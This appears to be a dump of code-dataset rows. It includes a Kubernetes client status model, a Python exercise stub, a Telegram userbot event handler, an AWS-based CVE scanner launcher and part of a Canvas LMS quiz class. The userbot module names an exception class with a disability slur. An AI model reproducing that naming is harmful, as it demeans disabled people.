openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'api_version': 'str',
'code': 'int',
'details': 'V1StatusDetails',
'kind': 'str',
'message': 'str',
'metadata': 'V1ListMeta',
'reason': 'str',
'status': 'str'
}
attribute_map = {
'api_version': 'apiVersion',
'code': 'code',
'details': 'details',
'kind': 'kind',
'message': 'message',
'metadata': 'metadata',
'reason': 'reason',
'status': 'status'
}
def __init__(self, api_version=None, code=None, details=None, kind=None, message=None, metadata=None, reason=None, status=None, local_vars_configuration=None): # noqa: E501
"""V1Status - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._api_version = None
self._code = None
self._details = None
self._kind = None
self._message = None
self._metadata = None
self._reason = None
self._status = None
self.discriminator = None
if api_version is not None:
self.api_version = api_version
if code is not None:
self.code = code
if details is not None:
self.details = details
if kind is not None:
self.kind = kind
if message is not None:
self.message = message
if metadata is not None:
self.metadata = metadata
if reason is not None:
self.reason = reason
if status is not None:
self.status = status
@property
def api_version(self):
"""Gets the api_version of this V1Status. # noqa: E501
APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources # noqa: E501
:return: The api_version of this V1Status. # noqa: E501
:rtype: str
"""
return self._api_version
@api_version.setter
def api_version(self, api_version):
"""Sets the api_version of this V1Status.
APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources # noqa: E501
:param api_version: The api_version of this V1Status. # noqa: E501
:type: str
"""
self._api_version = api_version
@property
def code(self):
"""Gets the code of this V1Status. # noqa: E501
Suggested HTTP return code for this status, 0 if not set. # noqa: E501
:return: The code of this V1Status. # noqa: E501
:rtype: int
"""
return self._code
@code.setter
def code(self, code):
"""Sets the code of this V1Status.
Suggested HTTP return code for this status, 0 if not set. # noqa: E501
:param code: The code of this V1Status. # noqa: E501
:type: int
"""
self._code = code
@property
def details(self):
"""Gets the details of this V1Status. # noqa: E501
:return: The details of this V1Status. # noqa: E501
:rtype: V1StatusDetails
"""
return self._details
@details.setter
def details(self, details):
"""Sets the details of this V1Status.
:param details: The details of this V1Status. # noqa: E501
:type: V1StatusDetails
"""
self._details = details
@property
def kind(self):
"""Gets the kind of this V1Status. # noqa: E501
Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds # noqa: E501
:return: The kind of this V1Status. # noqa: E501
:rtype: str
"""
return self._kind
@kind.setter
def kind(self, kind):
"""Sets the kind of this V1Status.
Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds # noqa: E501
:param kind: The kind of this V1Status. # noqa: E501
:type: str
"""
self._kind = kind
@property
def message(self):
"""Gets the message of this V1Status. # noqa: E501
A human-readable description of the status of this operation. # noqa: E501
:return: The message of this V1Status. # noqa: E501
:rtype: str
"""
return self._message
@message.setter
def message(self, message):
"""Sets the message of this V1Status.
A human-readable description of the status of this operation. # noqa: E501
:param message: The message of this V1Status. # noqa: E501
:type: str
"""
self._message = message
@property
def metadata(self):
"""Gets the metadata of this V1Status. # noqa: E501
:return: The metadata of this V1Status. # noqa: E501
:rtype: V1ListMeta
"""
return self._metadata
@metadata.setter
def metadata(self, metadata):
"""Sets the metadata of this V1Status.
:param metadata: The metadata of this V1Status. # noqa: E501
:type: V1ListMeta
"""
self._metadata = metadata
@property
def reason(self):
"""Gets the reason of this V1Status. # noqa: E501
A machine-readable description of why this operation is in the \"Failure\" status. If this value is empty there is no information available. A Reason clarifies an HTTP status code but does not override it. # noqa: E501
:return: The reason of this V1Status. # noqa: E501
:rtype: str
"""
return self._reason
@reason.setter
def reason(self, reason):
"""Sets the reason of this V1Status.
A machine-readable description of why this operation is in the \"Failure\" status. If this value is empty there is no information available. A Reason clarifies an HTTP status code but does not override it. # noqa: E501
:param reason: The reason of this V1Status. # noqa: E501
:type: str
"""
self._reason = reason
@property
def status(self):
"""Gets the status of this V1Status. # noqa: E501
Status of the operation. One of: \"Success\" or \"Failure\". More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#spec-and-status # noqa: E501
:return: The status of this V1Status. # noqa: E501
:rtype: str
"""
return self._status
@status.setter
def status(self, status):
"""Sets the status of this V1Status.
Status of the operation. One of: \"Success\" or \"Failure\". More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#spec-and-status # noqa: E501
:param status: The status of this V1Status. # noqa: E501
:type: str
"""
self._status = status
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, V1Status):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, V1Status):
return True
return self.to_dict() != other.to_dict()
| 31.952381 | 312 | 0.60765 |
import pprint
import re
import six
from kubernetes_asyncio.client.configuration import Configuration
class V1Status(object):
openapi_types = {
'api_version': 'str',
'code': 'int',
'details': 'V1StatusDetails',
'kind': 'str',
'message': 'str',
'metadata': 'V1ListMeta',
'reason': 'str',
'status': 'str'
}
attribute_map = {
'api_version': 'apiVersion',
'code': 'code',
'details': 'details',
'kind': 'kind',
'message': 'message',
'metadata': 'metadata',
'reason': 'reason',
'status': 'status'
}
def __init__(self, api_version=None, code=None, details=None, kind=None, message=None, metadata=None, reason=None, status=None, local_vars_configuration=None):
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._api_version = None
self._code = None
self._details = None
self._kind = None
self._message = None
self._metadata = None
self._reason = None
self._status = None
self.discriminator = None
if api_version is not None:
self.api_version = api_version
if code is not None:
self.code = code
if details is not None:
self.details = details
if kind is not None:
self.kind = kind
if message is not None:
self.message = message
if metadata is not None:
self.metadata = metadata
if reason is not None:
self.reason = reason
if status is not None:
self.status = status
@property
def api_version(self):
return self._api_version
@api_version.setter
def api_version(self, api_version):
self._api_version = api_version
@property
def code(self):
return self._code
@code.setter
def code(self, code):
self._code = code
@property
def details(self):
return self._details
@details.setter
def details(self, details):
self._details = details
@property
def kind(self):
return self._kind
@kind.setter
def kind(self, kind):
self._kind = kind
@property
def message(self):
return self._message
@message.setter
def message(self, message):
self._message = message
@property
def metadata(self):
return self._metadata
@metadata.setter
def metadata(self, metadata):
self._metadata = metadata
@property
def reason(self):
return self._reason
@reason.setter
def reason(self, reason):
self._reason = reason
@property
def status(self):
return self._status
@status.setter
def status(self, status):
self._status = status
def to_dict(self):
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
return pprint.pformat(self.to_dict())
def __repr__(self):
return self.to_str()
def __eq__(self, other):
if not isinstance(other, V1Status):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
if not isinstance(other, V1Status):
return True
return self.to_dict() != other.to_dict()
| true | true |
1c3070b018da55c9532e5a2ff75d604d17697ddf | 296 | py | Python | challenges/3.4.Strictly_Less_Than_Operator/main.py | pradeepsaiu/python-coding-challenges | b435ab650d85de267eeaa31a55ff77ef5dbff86b | [
"BSD-3-Clause"
] | 141 | 2017-05-07T00:38:22.000Z | 2022-03-25T10:14:25.000Z | challenges/3.4.Strictly_Less_Than_Operator/main.py | pradeepsaiu/python-coding-challenges | b435ab650d85de267eeaa31a55ff77ef5dbff86b | [
"BSD-3-Clause"
] | 23 | 2017-05-06T23:57:37.000Z | 2018-03-23T19:07:32.000Z | challenges/3.4.Strictly_Less_Than_Operator/main.py | pradeepsaiu/python-coding-challenges | b435ab650d85de267eeaa31a55ff77ef5dbff86b | [
"BSD-3-Clause"
] | 143 | 2017-05-07T09:33:35.000Z | 2022-03-12T21:04:13.000Z | def strictly_less_than(value):
if value : # Change this line
return "Less than 10"
elif value : # Change this line
return "Less than 100"
else:
return "100 or more"
# Change the value 1 below to experiment with different values
print(strictly_less_than(1))
| 26.909091 | 62 | 0.665541 | def strictly_less_than(value):
if value :
return "Less than 10"
elif value :
return "Less than 100"
else:
return "100 or more"
print(strictly_less_than(1))
| true | true |
1c3070c120e8c3dc30d18368bf6e88a29b79e99b | 6,058 | py | Python | userbot/events.py | userbot814/DCLXVI | 4bebc89324f51b93c86a9420df49ac3e3b78f29e | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | userbot/events.py | userbot814/DCLXVI | 4bebc89324f51b93c86a9420df49ac3e3b78f29e | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | userbot/events.py | userbot814/DCLXVI | 4bebc89324f51b93c86a9420df49ac3e3b78f29e | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | # Copyright (C) 2020 TeamDerUntergang.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
""" Olayları yönetmek için UserBot modülü.
UserBot'un ana bileşenlerinden biri. """
import sys
from asyncio import create_subprocess_shell as asyncsubshell
from asyncio import subprocess as asyncsub
from os import remove
from time import gmtime, strftime
from traceback import format_exc
from telethon import events
from userbot import bot, BOTLOG_CHATID, LOGSPAMMER, BLACKLIST
def register(**args):
""" Yeni bir etkinlik kaydedin. """
pattern = args.get('pattern', None)
disable_edited = args.get('disable_edited', False)
ignore_unsafe = args.get('ignore_unsafe', False)
unsafe_pattern = r'^[^/!#@\$A-Za-z]'
groups_only = args.get('groups_only', False)
trigger_on_fwd = args.get('trigger_on_fwd', False)
trigger_on_inline = args.get('trigger_on_inline', False)
disable_errors = args.get('disable_errors', False)
me = bot.get_me()
uid = me.id
uid not in BLACKLIST
if pattern is not None and not pattern.startswith('(?i)'):
args['pattern'] = '(?i)' + pattern
if "disable_edited" in args:
del args['disable_edited']
if "ignore_unsafe" in args:
del args['ignore_unsafe']
if "groups_only" in args:
del args['groups_only']
if "disable_errors" in args:
del args['disable_errors']
if "trigger_on_fwd" in args:
del args['trigger_on_fwd']
if "trigger_on_inline" in args:
del args['trigger_on_inline']
if pattern:
if not ignore_unsafe:
args['pattern'] = pattern.replace('^.', unsafe_pattern, 1)
def decorator(func):
async def wrapper(check):
if not LOGSPAMMER:
send_to = check.chat_id
else:
send_to = BOTLOG_CHATID
if not trigger_on_fwd and check.fwd_from:
return
if check.via_bot_id and not trigger_on_inline:
return
if groups_only and not check.is_group:
await check.respond("`I don't think this is a group.`")
return
try:
if uid not in BLACKLIST:
await func(check)
else:
raise RetardsException()
except events.StopPropagation:
raise events.StopPropagation
except RetardsException:
exit(1)
except KeyboardInterrupt:
pass
except:
if not disable_errors:
date = strftime("%Y-%m-%d %H:%M:%S", gmtime())
text = "**USERBOT ERROR REPORT**\n"
link = "Support chat PM: @NGGDCLXVI"
text += "If you want to, you can report it"
text += f"- just forward this message to {link}.\n"
text += "Nothing is logged except the fact of error and date\n"
ftext = "========== DISCLAIMER =========="
ftext += "\nThis file uploaded ONLY here,"
ftext += "\nwe logged only fact of error and date,"
ftext += "\nwe respect your privacy,"
ftext += "\nyou may not report this error if you've"
ftext += "\nany confidential data here, no one will see your data\n"
ftext += "================================\n\n"
ftext += "--------BEGIN USERBOT TRACEBACK LOG--------\n"
ftext += "\nDate: " + date
ftext += "\nChat ID: " + str(check.chat_id)
ftext += "\nSender ID: " + str(check.sender_id)
ftext += "\n\nEvent Trigger:\n"
ftext += str(check.text)
ftext += "\n\nTraceback info:\n"
ftext += str(format_exc())
ftext += "\n\nError text:\n"
ftext += str(sys.exc_info()[1])
ftext += "\n\n--------END USERBOT TRACEBACK LOG--------"
command = "git log --pretty=format:\"%an: %s\" -10"
ftext += "\n\n\nLast 10 commits:\n"
process = await asyncsubshell(command,
stdout=asyncsub.PIPE,
stderr=asyncsub.PIPE)
stdout, stderr = await process.communicate()
result = str(stdout.decode().strip()) \
+ str(stderr.decode().strip())
ftext += result
file = open("crash.log", "w+")
file.write(ftext)
file.close()
if LOGSPAMMER:
await check.client.respond("`Sorry, userbot has crashed..\
\nThe error logs are stored in the userbot's log chat.`")
await check.client.send_file(send_to,
"crash.log",
caption=text)
remove("crash.log")
if not disable_edited:
bot.add_event_handler(wrapper, events.MessageEdited(**args))
bot.add_event_handler(wrapper, events.NewMessage(**args))
return wrapper
return decorator
class RetardsException(Exception):
pass | 37.627329 | 88 | 0.535655 |
import sys
from asyncio import create_subprocess_shell as asyncsubshell
from asyncio import subprocess as asyncsub
from os import remove
from time import gmtime, strftime
from traceback import format_exc
from telethon import events
from userbot import bot, BOTLOG_CHATID, LOGSPAMMER, BLACKLIST
def register(**args):
pattern = args.get('pattern', None)
disable_edited = args.get('disable_edited', False)
ignore_unsafe = args.get('ignore_unsafe', False)
unsafe_pattern = r'^[^/!#@\$A-Za-z]'
groups_only = args.get('groups_only', False)
trigger_on_fwd = args.get('trigger_on_fwd', False)
trigger_on_inline = args.get('trigger_on_inline', False)
disable_errors = args.get('disable_errors', False)
me = bot.get_me()
uid = me.id
uid not in BLACKLIST
if pattern is not None and not pattern.startswith('(?i)'):
args['pattern'] = '(?i)' + pattern
if "disable_edited" in args:
del args['disable_edited']
if "ignore_unsafe" in args:
del args['ignore_unsafe']
if "groups_only" in args:
del args['groups_only']
if "disable_errors" in args:
del args['disable_errors']
if "trigger_on_fwd" in args:
del args['trigger_on_fwd']
if "trigger_on_inline" in args:
del args['trigger_on_inline']
if pattern:
if not ignore_unsafe:
args['pattern'] = pattern.replace('^.', unsafe_pattern, 1)
def decorator(func):
async def wrapper(check):
if not LOGSPAMMER:
send_to = check.chat_id
else:
send_to = BOTLOG_CHATID
if not trigger_on_fwd and check.fwd_from:
return
if check.via_bot_id and not trigger_on_inline:
return
if groups_only and not check.is_group:
await check.respond("`I don't think this is a group.`")
return
try:
if uid not in BLACKLIST:
await func(check)
else:
raise RetardsException()
except events.StopPropagation:
raise events.StopPropagation
except RetardsException:
exit(1)
except KeyboardInterrupt:
pass
except:
if not disable_errors:
date = strftime("%Y-%m-%d %H:%M:%S", gmtime())
text = "**USERBOT ERROR REPORT**\n"
link = "Support chat PM: @NGGDCLXVI"
text += "If you want to, you can report it"
text += f"- just forward this message to {link}.\n"
text += "Nothing is logged except the fact of error and date\n"
ftext = "========== DISCLAIMER =========="
ftext += "\nThis file uploaded ONLY here,"
ftext += "\nwe logged only fact of error and date,"
ftext += "\nwe respect your privacy,"
ftext += "\nyou may not report this error if you've"
ftext += "\nany confidential data here, no one will see your data\n"
ftext += "================================\n\n"
ftext += "--------BEGIN USERBOT TRACEBACK LOG--------\n"
ftext += "\nDate: " + date
ftext += "\nChat ID: " + str(check.chat_id)
ftext += "\nSender ID: " + str(check.sender_id)
ftext += "\n\nEvent Trigger:\n"
ftext += str(check.text)
ftext += "\n\nTraceback info:\n"
ftext += str(format_exc())
ftext += "\n\nError text:\n"
ftext += str(sys.exc_info()[1])
ftext += "\n\n--------END USERBOT TRACEBACK LOG--------"
command = "git log --pretty=format:\"%an: %s\" -10"
ftext += "\n\n\nLast 10 commits:\n"
process = await asyncsubshell(command,
stdout=asyncsub.PIPE,
stderr=asyncsub.PIPE)
stdout, stderr = await process.communicate()
result = str(stdout.decode().strip()) \
+ str(stderr.decode().strip())
ftext += result
file = open("crash.log", "w+")
file.write(ftext)
file.close()
if LOGSPAMMER:
await check.client.respond("`Sorry, userbot has crashed..\
\nThe error logs are stored in the userbot's log chat.`")
await check.client.send_file(send_to,
"crash.log",
caption=text)
remove("crash.log")
if not disable_edited:
bot.add_event_handler(wrapper, events.MessageEdited(**args))
bot.add_event_handler(wrapper, events.NewMessage(**args))
return wrapper
return decorator
class RetardsException(Exception):
pass | true | true |
1c3070e15e0e0e85afeb3600a16c8efd262bddf6 | 2,170 | py | Python | main.py | riddopic/red-detector | 02a7ab59fdfaeabbfb9c641649bfb2618fba5310 | [
"Apache-2.0"
] | 73 | 2020-11-26T17:19:07.000Z | 2022-03-24T15:32:41.000Z | main.py | riddopic/red-detector | 02a7ab59fdfaeabbfb9c641649bfb2618fba5310 | [
"Apache-2.0"
] | 4 | 2020-12-05T01:40:09.000Z | 2021-11-22T14:36:43.000Z | main.py | riddopic/red-detector | 02a7ab59fdfaeabbfb9c641649bfb2618fba5310 | [
"Apache-2.0"
] | 17 | 2020-12-02T06:03:12.000Z | 2022-02-28T21:49:38.000Z | import argparse
from art import text2art
from src.logger import setup_logger
from src.snapper import Snapper
from src.scanner import Scanner
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--region', action='store', dest='region', type=str,
help='region name', required=False)
parser.add_argument('--instance-id', action='store', dest='instance_id', type=str,
help='EC2 instance id', required=False)
parser.add_argument('--keypair', action='store', dest='keypair', type=str,
help='existing key pair name', required=False)
parser.add_argument('--log-level', action='store', dest='log_level', type=str,
help='log level', required=False, default="INFO")
text_art = text2art("RED DETECTOR")
print(text_art)
print(" +++ WELCOME RED-DETECTOR - CVE SCANNER USING VULS +++\n\n")
cmd_args = parser.parse_args()
logger = setup_logger(log_level=cmd_args.log_level)
snapper = Snapper(logger=logger)
if cmd_args.region:
snapper.region = cmd_args.region
else:
snapper.region = snapper.select_region()
snapper.create_client()
if cmd_args.instance_id:
source_volume_id = snapper.get_instance_root_vol(instance_id=cmd_args.instance_id)
else:
source_volume_id = snapper.select_ec2_instance()
volume_id, selected_az, snapshot_id = snapper.snapshot2volume(volume_id=source_volume_id)
scanner = Scanner(logger=logger, region=snapper.region)
if cmd_args.keypair:
scanner.keypair_name = cmd_args.keypair
else:
scanner.keypair_name = scanner.create_keypair(key_name='red_detector_key')
ec2_instance_id, ec2_instance_public_ip, report_service_port = scanner.create_ec2(selected_az=selected_az)
scanner.attach_volume_to_ec2(ec2_instance_id=ec2_instance_id, volume_id=volume_id)
scanner.scan_and_report(ec2_instance_public_ip=ec2_instance_public_ip,
report_service_port=report_service_port, ec2_instance_id=ec2_instance_id,
snapshot_id=snapshot_id)
| 43.4 | 110 | 0.694009 | import argparse
from art import text2art
from src.logger import setup_logger
from src.snapper import Snapper
from src.scanner import Scanner
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--region', action='store', dest='region', type=str,
help='region name', required=False)
parser.add_argument('--instance-id', action='store', dest='instance_id', type=str,
help='EC2 instance id', required=False)
parser.add_argument('--keypair', action='store', dest='keypair', type=str,
help='existing key pair name', required=False)
parser.add_argument('--log-level', action='store', dest='log_level', type=str,
help='log level', required=False, default="INFO")
text_art = text2art("RED DETECTOR")
print(text_art)
print(" +++ WELCOME RED-DETECTOR - CVE SCANNER USING VULS +++\n\n")
cmd_args = parser.parse_args()
logger = setup_logger(log_level=cmd_args.log_level)
snapper = Snapper(logger=logger)
if cmd_args.region:
snapper.region = cmd_args.region
else:
snapper.region = snapper.select_region()
snapper.create_client()
if cmd_args.instance_id:
source_volume_id = snapper.get_instance_root_vol(instance_id=cmd_args.instance_id)
else:
source_volume_id = snapper.select_ec2_instance()
volume_id, selected_az, snapshot_id = snapper.snapshot2volume(volume_id=source_volume_id)
scanner = Scanner(logger=logger, region=snapper.region)
if cmd_args.keypair:
scanner.keypair_name = cmd_args.keypair
else:
scanner.keypair_name = scanner.create_keypair(key_name='red_detector_key')
ec2_instance_id, ec2_instance_public_ip, report_service_port = scanner.create_ec2(selected_az=selected_az)
scanner.attach_volume_to_ec2(ec2_instance_id=ec2_instance_id, volume_id=volume_id)
scanner.scan_and_report(ec2_instance_public_ip=ec2_instance_public_ip,
report_service_port=report_service_port, ec2_instance_id=ec2_instance_id,
snapshot_id=snapshot_id)
| true | true |
1c3071d13f3846e980379db6ae1253b2f439df34 | 1,983 | py | Python | identify-keys.py | TntMatthew/kbdisplay | 3ad974504fd2ecbb3af35f31c9148ef88c03868f | [
"MIT"
] | 1 | 2021-12-28T23:54:48.000Z | 2021-12-28T23:54:48.000Z | identify-keys.py | Tiyenti/kbdisplay | 2e53752caa0223b78607f7daa98c0bffe850098b | [
"MIT"
] | null | null | null | identify-keys.py | Tiyenti/kbdisplay | 2e53752caa0223b78607f7daa98c0bffe850098b | [
"MIT"
] | null | null | null | import subprocess
from enum import Enum
# TODO: Figure out what the rest of these are
class Keycode(Enum):
ESC = 9
ONE = 10
TWO = 11
THREE = 12
FOUR = 13
FIVE = 14
SIX = 15
SEVEN = 16
EIGHT = 17
NINE = 18
ZERO = 19
MINUS = 20
EQUALS = 21
BACKSPACE = 22
TAB = 23
Q = 24
W = 25
E = 26
R = 27
T = 28
Y = 29
U = 30
I = 31
O = 32
P = 33
RIGHTBRACE = 34
LEFTBRACE = 35
ENTER = 36
LEFTCTRL = 37
A = 38
S = 39
D = 40
F = 41
G = 42
H = 43
J = 44
K = 45
L = 46
COLON = 47
QUOTE = 48
GRAVE = 49
LEFTSHIFT = 50
HASH = 51
Z = 52
X = 53
C = 54
V = 55
B = 56
N = 57
M = 58
COMMA = 59
PERIOD = 60
SLASH = 61
RIGHTSHIFT = 62
LEFTALT = 64
SPACE = 65
CAPSLOCK = 66
F1 = 67
F2 = 68
F3 = 69
F4 = 70
F5 = 71
F6 = 72
F7 = 73
F8 = 74
F9 = 75
F10 = 76
SCROLLLOCK = 78
F11 = 95
F12 = 96
RIGHTCTRL = 105
PRTSCN = 107
ALTGR = 108
HOME = 110
UP = 111
PGUP = 112
LEFT = 113
RIGHT = 114
END = 115
DOWN = 116
PGDOWN = 117
INSERT = 118
DELETE = 119
PAUSE = 127
LEFTSUPER = 133
MENU = 135
proc = subprocess.Popen(['xinput', 'test-xi2', '--root'],
stdout=subprocess.PIPE)
inkeypressevent = False
inkeyreleaseevent = False
while True:
line = proc.stdout.readline()
if line != '':
if line == b'EVENT type 2 (KeyPress)\n':
inkeypressevent = True
elif line.startswith(b' detail:') and inkeypressevent:
code = int(line.split()[1])
try:
key = Keycode(code)
print(key, end='')
print(' - ', end='')
print(code)
except ValueError:
print('unknown key - ' + code)
inkeypressevent = False
| 17.094828 | 65 | 0.467978 | import subprocess
from enum import Enum
class Keycode(Enum):
ESC = 9
ONE = 10
TWO = 11
THREE = 12
FOUR = 13
FIVE = 14
SIX = 15
SEVEN = 16
EIGHT = 17
NINE = 18
ZERO = 19
MINUS = 20
EQUALS = 21
BACKSPACE = 22
TAB = 23
Q = 24
W = 25
E = 26
R = 27
T = 28
Y = 29
U = 30
I = 31
O = 32
P = 33
RIGHTBRACE = 34
LEFTBRACE = 35
ENTER = 36
LEFTCTRL = 37
A = 38
S = 39
D = 40
F = 41
G = 42
H = 43
J = 44
K = 45
L = 46
COLON = 47
QUOTE = 48
GRAVE = 49
LEFTSHIFT = 50
HASH = 51
Z = 52
X = 53
C = 54
V = 55
B = 56
N = 57
M = 58
COMMA = 59
PERIOD = 60
SLASH = 61
RIGHTSHIFT = 62
LEFTALT = 64
SPACE = 65
CAPSLOCK = 66
F1 = 67
F2 = 68
F3 = 69
F4 = 70
F5 = 71
F6 = 72
F7 = 73
F8 = 74
F9 = 75
F10 = 76
SCROLLLOCK = 78
F11 = 95
F12 = 96
RIGHTCTRL = 105
PRTSCN = 107
ALTGR = 108
HOME = 110
UP = 111
PGUP = 112
LEFT = 113
RIGHT = 114
END = 115
DOWN = 116
PGDOWN = 117
INSERT = 118
DELETE = 119
PAUSE = 127
LEFTSUPER = 133
MENU = 135
proc = subprocess.Popen(['xinput', 'test-xi2', '--root'],
stdout=subprocess.PIPE)
inkeypressevent = False
inkeyreleaseevent = False
while True:
line = proc.stdout.readline()
if line != '':
if line == b'EVENT type 2 (KeyPress)\n':
inkeypressevent = True
elif line.startswith(b' detail:') and inkeypressevent:
code = int(line.split()[1])
try:
key = Keycode(code)
print(key, end='')
print(' - ', end='')
print(code)
except ValueError:
print('unknown key - ' + code)
inkeypressevent = False
| true | true |
1c3072f1d5729e267d6619856d7905348a976d2e | 33,726 | py | Python | canvasapi/quiz.py | marvic2409/canvasapi | 2e8a151b081ff1c6700d9baaa71f13c2b9bb515c | [
"MIT"
] | null | null | null | canvasapi/quiz.py | marvic2409/canvasapi | 2e8a151b081ff1c6700d9baaa71f13c2b9bb515c | [
"MIT"
] | null | null | null | canvasapi/quiz.py | marvic2409/canvasapi | 2e8a151b081ff1c6700d9baaa71f13c2b9bb515c | [
"MIT"
] | null | null | null | from __future__ import absolute_import, division, print_function, unicode_literals
import warnings
from six import python_2_unicode_compatible
from canvasapi.canvas_object import CanvasObject
from canvasapi.exceptions import RequiredFieldMissing
from canvasapi.paginated_list import PaginatedList
from canvasapi.quiz_group import QuizGroup
from canvasapi.submission import Submission
from canvasapi.user import User
from canvasapi.util import combine_kwargs, obj_or_id
@python_2_unicode_compatible
class Quiz(CanvasObject):
    """A Canvas quiz, scoped to a course (``self.course_id`` is set by the
    code that constructs instances elsewhere in this package)."""

    def __str__(self):
        return "{} ({})".format(self.title, self.id)

    def broadcast_message(self, conversations, **kwargs):
        """
        Send a message to unsubmitted or submitted users for the quiz.

        :calls: `POST /api/v1/courses/:course_id/quizzes/:id/submission_users/message \
        <https://canvas.instructure.com/doc/api/quiz_submission_user_list.html#method.quizzes/quiz_submission_users.message>`_

        :param conversations: A dictionary representing a Conversation.
            Requires `'body'`, `'recipients'`, and `'subject'` keys.
        :type conversations: dict

        :returns: True if the message was created, False otherwise
        :rtype: bool
        """
        required_key_list = ["body", "recipients", "subject"]
        required_keys_present = all((x in conversations for x in required_key_list))
        if isinstance(conversations, dict) and required_keys_present:
            kwargs["conversations"] = conversations
        else:
            raise RequiredFieldMissing(
                (
                    "conversations must be a dictionary with keys "
                    "'body', 'recipients', and 'subject'."
                )
            )
        response = self._requester.request(
            "POST",
            "courses/{}/quizzes/{}/submission_users/message".format(
                self.course_id, self.id
            ),
            _kwargs=combine_kwargs(**kwargs),
        )
        # Canvas answers 201 Created when the message was accepted.
        return response.status_code == 201

    def create_question(self, **kwargs):
        """
        Create a new quiz question for this quiz.

        :calls: `POST /api/v1/courses/:course_id/quizzes/:quiz_id/questions \
        <https://canvas.instructure.com/doc/api/quiz_questions.html#method.quizzes/quiz_questions.create>`_

        :rtype: :class:`canvasapi.quiz.QuizQuestion`
        """
        response = self._requester.request(
            "POST",
            "courses/{}/quizzes/{}/questions".format(self.course_id, self.id),
            _kwargs=combine_kwargs(**kwargs),
        )
        response_json = response.json()
        # Carry the course id along so the QuizQuestion can build its own URLs.
        response_json.update({"course_id": self.course_id})
        return QuizQuestion(self._requester, response_json)

    def create_question_group(self, quiz_groups, **kwargs):
        """
        Create a new question group for the given quiz id.

        :calls: `POST /api/v1/courses/:course_id/quizzes/:quiz_id/groups \
        <https://canvas.instructure.com/doc/api/quiz_question_groups.html#method.quizzes/quiz_groups.create>`_

        :param quiz_groups: The name, pick count, question points,
            and/or assessment question bank id.
            All of these parameters are optional, but at least one must exist
            (even if empty) to receive a response.
            The request expects a list, but will only create 1 question group per request.
        :type quiz_groups: list[dict]

        :returns: `QuizGroup` object
        :rtype: :class:`canvasapi.quiz_group.QuizGroup`
        """
        if not isinstance(quiz_groups, list) or not quiz_groups:
            raise ValueError("Param `quiz_groups` must be a non-empty list.")
        if not isinstance(quiz_groups[0], dict):
            # NOTE(review): error message is missing the closing backtick
            # after `quiz_groups` — runtime string, left untouched here.
            raise ValueError("Param `quiz_groups must contain a dictionary")
        param_list = [
            "name",
            "pick_count",
            "question_points",
            "assessment_question_bank_id",
        ]
        if not any(param in quiz_groups[0] for param in param_list):
            raise RequiredFieldMissing("quiz_groups must contain at least 1 parameter.")
        kwargs["quiz_groups"] = quiz_groups
        response = self._requester.request(
            "POST",
            "courses/{}/quizzes/{}/groups".format(self.course_id, self.id),
            _kwargs=combine_kwargs(**kwargs),
        )
        response_json = response.json()
        # NOTE(review): this stores the *quiz* id (self.id) under "course_id",
        # unlike most methods here which use self.course_id — confirm QuizGroup
        # really expects the quiz id in that slot.
        response_json["quiz_groups"][0].update({"course_id": self.id})
        return QuizGroup(self._requester, response_json.get("quiz_groups")[0])

    def create_report(self, report_type, **kwargs):
        """
        Create and return a new report for this quiz. If a previously generated report
        matches the arguments and is still current (i.e. there have been no new submissions),
        it will be returned.

        :calls: `POST /api/v1/courses/:course_id/quizzes/:quiz_id/reports \
